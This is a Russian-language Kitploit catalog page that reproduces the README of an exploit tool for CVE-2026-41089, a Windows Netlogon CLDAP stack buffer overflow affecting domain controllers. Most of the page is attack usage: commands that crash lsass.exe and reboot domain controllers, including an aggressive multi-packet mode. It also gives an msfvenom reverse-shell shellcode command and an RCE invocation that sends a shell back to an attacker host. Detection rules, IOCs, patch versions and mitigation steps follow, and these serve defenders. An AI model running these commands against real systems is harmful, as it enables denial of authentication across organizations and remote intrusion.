Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41089 — CVE-2026-41089 - это критическая уязвимость удаленного выполнения кода в службе Netlogon Windows, один пакет может привести к сбою lsass.exe, что вызовет перезагрузку контроллера домена примерно через 30-60 секунд. В течение этого времени вся доменная аутентификация на этом контроллере домена будет неудачной. | Kitploit
Инструменты/GitHubGitHub/hnytgl/cve-2026-41089
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

Репозиторий
1412223 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-41089 - это критическая уязвимость удаленного выполнения кода в службе Netlogon Windows, один пакет может привести к сбою lsass.exe, что вызовет перезагрузку контроллера домена примерно через 30-60 секунд. В течение этого времени вся доменная аутентификация на этом контроллере домена будет неудачной.

Поделиться

CVE-2026-41089 — Windows Netlogon CLDAP Stack Buffer Overflow RCE Exploit

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Critical)
CWE: CWE-121 (Stack-based Buffer Overflow)
Вектор атаки: UDP/389 (CLDAP SearchRequest)
Воздействие: удалённое выполнение кода (RCE) / отказ в обслуживании (DoS)
Затронутые версии: Windows Server 2012 R2 ~ 2025 (Domain Controllers)
Патч: накопительное обновление за май 2026 г.

Обзор уязвимости

Функция NetpLogonPutUnicodeString в netlogon.dll содержит уязвимость переполнения стекового буфера при обработке CLDAP-запросов поиска. Функция принимает бюджет длины в байтах, но интерпретирует его как количество WCHAR, что приводит к записи в 2 раза большего объёма, чем ожидается.

Переполнение происходит в фиксированном стековом буфере размером 528 байт (264 ushort) функции NlGetLocalPingResponse. Контролируемое атакующим поле User вместе с собственным DNS-именем домена сервера заполняют этот буфер, что в конечном итоге перезаписывает GS security cookie, вызывая __report_gsfailure и падение lsass.exe.

Условия срабатывания

  • NtVer=0x02 в CLDAP SearchRequest (принудительное использование старого уязвимого пути BuildSamLogonResponse)
  • Длина поля User ≥ ~130 символов (бинарный предел около 260 байт UTF-16)
  • Длина DNS-имени домена сервера ≥ ~80 символов (чем длиннее домен, тем легче достичь cookie)

Примечание: NtVer=0x16 (значение, используемое во многих публичных скриптах обнаружения) задействует безопасный путь BuildSamLogonResponseEx и не вызывает уязвимость.

Возможности

РежимОписание
--mode dosОтправляет специально сформированный CLDAP-пакет, вызывающий падение LSASS и перезагрузку DC (~60 секунд нарушения аутентификации)
--mode rceПопытка удалённого выполнения кода (исследовательский уровень, требует shellcode)
--mode scanСканирует ответы для различных значений NtVer, выполняя фингерпринтинг целевого DC
--mode autoАвтоматически определяет и выбирает оптимальную стратегию атаки

Режим DoS

Один пакет вызывает падение lsass.exe, что приводит к перезагрузке контроллера домена в течение примерно 30-60 секунд. В течение этого времени вся доменная аутентификация на данном DC будет завершаться ошибкой.

# Базовое использование — отправка 3 пакетов
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Быстрая атака одним пакетом
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Агрессивный режим — 5 пакетов параллельно
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

Режим RCE

⚠️ Исследовательский уровень — ненадёжен и нестабилен в реальных условиях.

RCE сталкивается со следующими проблемами:

  1. Данные переполнения — это собственное DNS-имя сервера, а не shellcode атакующего
  2. GS Cookie необходимо обойти (требуется примитив утечки информации или брутфорс)
  3. CET/ACG/CFG на Server 2022+ усложняют традиционный ROP
# Генерация shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# Отправка RCE-цепочки
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Режим сканирования

# Фингерпринтинг целевого DC
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Пример ожидаемого вывода (пропатченная цель):

NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Пример ожидаемого вывода (непропатченная цель):

NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Если NtVer=0x02 завершается таймаутом, а другие версии отвечают нормально, цель, скорее всего, уязвима.

Расширенные параметры

ПараметрОписаниеЗначение по умолчанию
-l, --user-lenДлина поля имени пользователя (в ASCII-символах)180
--ntverЗначение NtVer (шестнадцатеричное, например 0x02)0x02
--countКоличество отправляемых DoS-пакетов3
--delayЗадержка между пакетами (секунды)0.5
-t, --timeoutТаймаут сокета (секунды)5.0
--jsonВывод результатов в формате JSON—
--rawПечать шестнадцатеричного дампа сырого пакета перед отправкой—
--quietПодавление вывода баннера—
--shellcode-fileПользовательский файл shellcode (сырой x64)—
--lhostАдрес прослушивания для reverse shell—
--lportПорт прослушивания для reverse shell4444

Настройка тестовой среды

# Создание DC с длинным доменным именем на Windows Server (непропатченном):
# 1. Повышение до контроллера домена (домен с очень длинным DNS-именем, например "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. Убедитесь, что установлены патчи до мая 2026 г.
# 3. Запуск с атакующей машины:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. Наблюдайте падение и перезагрузку DC

Индикаторы компрометации (IOC)

Сетевые

  • CLDAP SearchRequest на UDP/389 с User > 100 байт и NtVer = 0x02
  • Аномальный CLDAP-трафик от не-DC хостов к DC

Хостовые

Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Правила обнаружения

index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Информация о патче

Версия Windows ServerНомер пропатченной версииПримечания
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

Руководство по обнаружению и устранению

Быстрое обнаружение (неразрушающее)

# Безопасный скрипт обнаружения — не вызывает падения цели
python detect_CVE-2026-41089.py <DC_IP> <DOMAIN>

# Вывод JSON (подходит для массового сканирования)
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --json

# Показать шаги проверки патча
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --check-patch

Принцип обнаружения: отправляются короткие CLDAP-запросы с NtVer=0x02 (активирует уязвимый путь) и NtVer=0x16 (безопасный путь). Если 0x02 завершается таймаутом, а 0x16 отвечает нормально, цель, скорее всего, уязвима.

Шаги устранения

  1. Немедленно установите патч: накопительное обновление за май 2026 г. (KB5058405 или выше)

    # Проверка установленных обновлений
    Get-HotFix | Where-Object {$_.InstalledOn -gt '2026-05-01'}
    
    # Установка последних обновлений
    Install-WindowsUpdate -AcceptAll -AutoReboot
    
  2. Проверьте версию netlogon.dll:

    (Get-Item C:\Windows\System32\netlogon.dll).VersionInfo.FileVersion
    # Сравните с таблицей версий патчей выше
    
  3. Временные меры защиты (если патч невозможно установить немедленно):

    • Ограничьте входящий трафик UDP/389 на межсетевом экране, разрешив доступ к DC только из доверенных подсетей
    • Разверните правила IDS для обнаружения аномальных CLDAP-запросов (поле User > 100 байт + NtVer=0x02)
    • Включите Credential Guard и HVCI для снижения воздействия RCE
Скачать инструмент